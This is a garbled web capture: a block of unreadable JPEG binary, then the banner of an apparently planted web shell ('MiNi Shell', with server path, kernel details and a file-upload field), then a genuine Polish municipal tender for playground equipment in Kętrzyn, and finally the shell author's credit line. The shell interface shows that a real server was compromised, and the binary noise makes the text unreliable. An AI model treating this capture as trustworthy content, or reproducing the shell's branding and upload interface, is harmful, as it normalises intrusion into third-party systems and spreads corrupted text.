JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150512/110484-N-2015.html

<p class="kh_header"><b>Kętrzyn: DOSTAWA I MONTAŻ WYPOSAŻENIA PLACÓW ZABAW NA TERENIE GMINY KĘTRZYN.</b><br>
<b>Numer ogłoszenia: 110484 - 2015; data zamieszczenia: 12.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kętrzyn , ul. Kościuszki 2, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 7512474 w. 17, faks 089 7512746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaketrzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA I MONTAŻ WYPOSAŻENIA PLACÓW ZABAW NA TERENIE GMINY KĘTRZYN..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje dostawy w ramach realizowanego przez Gminę Kętrzyn projektu Przedszkole przyszłości  , współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki, 
    priorytet :         IX.     Rozwój wykształcenia i kompetencji w regionach
    działanie:         9.1     Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty 
     poddziałanie : 9.1.1   Zmniejszenie nierówności w stopniu upowszechnienia edukacji przedszkolnej

2. Wykonawca wyposaży place zabaw, wymienione w ust. 3, w niżej wymieniony sprzęt,  zgodnie z poniższymi wymogami.


Rodzaj urządzeń, wymagania dotyczące wymiarów, ilość sztuk, wymagania dotyczące elementów urządzenia, zakres zamówienia :

1. Huśtawka podwójna wahadłowa
co najmniej:
- 1,5 x 2,5 m
   (szer.x dł.)
-  1,8m wysokości;
ilość: 3 szt.
1.1 Konstrukcja w postaci czterech słupów :
- drewnia o przekroju kwadratowym co najmniej  9 cm x 9 cm lub okrągłym o średnicy co  najmniej 9 cm, lub
- metalowa.
1.2 Belka pozioma metalowa.
1.3 Dwa siedziska typu koszyk z zabezpieczeniem przed wypadnięciem w postaci zapinanego łańcuszka, mocowane na dwóch łańcuchach każde.        
1.4 Zawiesia huśtawki łożyskowe.
1.5 Mocowanie do podłoża : ocynkowane kotwy stalowe, zabetonowane w podłożu.
1.6 Zakres zamówienia : dostawa i montaż.

2. Bujak podwójny na sprężynie
wysokość siedziska : ok.50 cm ,
długość urządzenia : nie mniej niż 150 cm
ilość : 4 szt.
2.1 Bujak na sprężynie dla dwóch osób z materiałów odpornych na warunki atmosferyczne.
2.2 Dwa siedziska, uchwyty na dłonie, 
2.3 Sprężyna stalowa.
2.4 Mocowanie trwałe w gruncie poprzez zabetonowanie.
2.5 Zakres zamówienia : dostawa i montaż.

3. Ławka parkowa
długość co najmniej 160 cm
ilość : 6 szt.
3.1 Konstrukcja drewniano - żeliwna lub drewniano - stalowa.
3.2 Siedzisko i oparcie wykonane z desek drewnianych, impregnowanych, grubości min.32 mm. 
3.3 Mocowanie trwałe w gruncie poprzez zabetonowanie.
3.4 Zakres zamówienia : dostawa i montaż.

4. Kosz na śmieci
pojemność  min.  30 dm3
ilość : 3 szt.
4.1 Konstrukcja drewniana lub metalowa.
4.2  Mocowanie trwałe w gruncie poprzez zabetonowanie
4.3 Zakres zamówienia : dostawa i montaż.


5. Tablica informacyjna z regulaminem placu zabaw
ilość : 4 szt.
5.1  Konstrukcja drewniana, metalowa lub metalowo-drewniana.
5.2  Mocowanie trwałe w gruncie poprzez zabetonowanie
5.3  Zakres zamówienia : dostawa i montaż.


6. Huśtawka ptasie gniazdo 
co najmniej :
-wysokość 1,8m
-długość   2,5m
-szerokość 1,5m
ilość : 4 szt.
6.1 Huśtawka typu ptasie gniazdo dla dzieci w wieku 3+,
- konstrukcja słupów metalowa lub z drewna klejonego,
- belka górna metalowa,
- gniazdo podwieszone do górnej belki za pomocą lin lub łańcuchów, siedzisko okrągłe o średnicy ok. 1,0m, obrzeże siedziska owinięte liną, chroniącą  przed uderzeniem przez krawędź siedziska, środek siedziska w formie siatki z lin,
- maksymalne obciążenie siedziska : min. 300 kg. 
6.2 Mocowanie do podłoża : ocynkowane kotwy stalowe, zabetonowane w podłożu.
6.3 Zakres zamówienia : dostawa i montaż.

     
3.   Zamówienie  obejmuje dostawę i montaż dostarczonego wyposażenia na placach zabaw oddziałów przedszkolnych przy szkołach podstawowych w miejscowościach :
1) Nakomiady - wyposażenie wymienione w ust. 2 poz. 1, 2, 4, 5, 6  :  po 1 szt.
                                                                       poz. 3       :            2 szt.
2) Kruszewiec  - wyposażenie wymienione w ust. 2 poz. 2, 5 ,6 :         po 1 szt.
                                                                                     
3) Wilkowo  - wyposażenie wymienione w ust. 2   poz. 1, 2, 4, 5, 6  :    po 1 szt.
                                                                         poz. 3       :           2 szt.      4) Biedaszki - wyposażenie wymienione w ust. 2   poz.1, 2, 4, 5, 6  :    po 1 szt. 
                                                                   poz. 3       :                 2 szt.
     Szczegółowe lokalizacje placów zabaw wskaże Zamawiający.

4.      Z zastrzeżeniem innych wymagań określonych w SIWZ oferowany  sprzęt musi spełniać  również następujące  wymagania :
  1) drewno o gładkiej powierzchni, sosnowe lub świerkowe, impregnowane,  jeżeli zgodnie z wymogami określonymi w ust.2 nie jest wymagane drewno klejone, to musi być bezrdzeniowe;
  2) elementy metalowe ocynkowane lub malowane proszkowo; łańcuchy ocynkowane,
  3) zawiesia huśtawek łożyskowe,                                  
  4) śruby i inne ostre elementy zabezpieczone zaślepką z tworzywa,                
  5) sprzęt mocowany do podłoża za pomocą ocynkowanych stalowych kotew, zabetonowanych w podłożu, 
  6) sprzęt musi być  estetyczny i zapewniać użytkownikom bezpieczeństwo użytkowania.
             
5. Wyposażenie  placów zabaw i jego montaż muszą być objęte gwarancją jakości przez okres podany w ofercie wykonawcy lecz nie krótszy niż 24 miesiące  i być zgodne z normą PN-EN 1176. Wyposażenie musi posiadać aktualny certyfikat lub deklarację zgodności, potwierdzające zgodność produktu z w/w  normą. Na sprzęcie muszą być umieszczone informacje (oznakowanie), zawierające      w szczególności dane producenta, datę produkcji, numer normy, zgodnie z którą urządzenie wyprodukowano.
    Udzielona gwarancja nie może być uzależniona od dodatkowych zobowiązań zamawiającego wobec wykonawcy, np. zlecania wykonawcy przeglądów wyposażenia.

6. Posadowienie urządzeń  musi uwzględniać zachowanie stref bezpieczeństwa pomiędzy urządzeniami.
     Zamówienie nie obejmuje wykonania bezpiecznych nawierzchni pod urządzeniami zabawowymi.

7. Wszystkie elementy wyposażenia muszą być fabrycznie nowe.  Wraz z w/w sprzętem wykonawca zamówienia  dostarczy zamawiającemu naklejki do oznakowania sprzętu, wg załączonego wzoru, odporne na warunki atmosferyczne, informujące o dofinansowaniu zamówienia. Liczba naklejek musi odpowiadać liczbie sztuk sprzętu.

8. Place zabaw będą użytkowane w celach publicznych .  

9. Kody CPV  . 
                          37535200-9 Wyposażenie placów zabaw
                          45112723-9 Roboty w zakresie kształtowania placów zabaw      
             
10. Zamawiający zastrzega sobie prawo zmniejszenia wielkości zamówienia.

11. Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art.67 ust.1 pkt 6 ustawy, o łącznej wartości nie większej niż 20% wartości zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień. Wykonawcy nie przysługuje roszczenie o udzielenie zamówienia uzupełniającego.

12. Zamawiającemu przysługuje prawo zmiany zakresu wyposażenia poszczególnych placów zabaw w ramach zakupionego sprzętu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie określa szczegółowych wymagań; ocena spełniania tego warunku odbywać się będzie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie  z art. 22 ust. 1  ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże wykonanie w sposób należyty      w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zamówienia, obejmującego dostawę i montaż wyposażenia placów zabaw,  o wartości co najmniej 20 000,- zł (dwadzieścia tysięcy);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie określa szczegółowych wymagań; ocena spełniania tego warunku odbywać się będzie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie  z art. 22 ust. 1  ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie określa szczegółowych wymagań; ocena spełniania tego warunku odbywać się będzie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1  ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie określa szczegółowych wymagań; ocena spełniania tego warunku odbywać się będzie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1  ustawy Prawo zamówień publicznych;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dla każdego rodzaju sprzętu: certyfikat potwierdzający zgodność  z  normą  PN-EN 1176, poświadczony za zgodność z oryginałem przez wykonawcę lub podpisana przez wykonawcę deklaracja zgodności z normą PN-EN 1176 ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/ketrzyn_gmina_wiejska/zamowienia_publiczne/110/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok. 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2015 godzina 10:00, miejsce: Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok. 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamówienie dofinansowane z  :  Program Operacyjny Kapitał Ludzki, 
    priorytet :         IX.      Rozwój wykształcenia i kompetencji w regionach
    działanie:         9.1      Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty 
    poddziałanie : 9.1.1   Zmniejszenie nierówności w stopniu upowszechnienia edukacji przedszkolnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com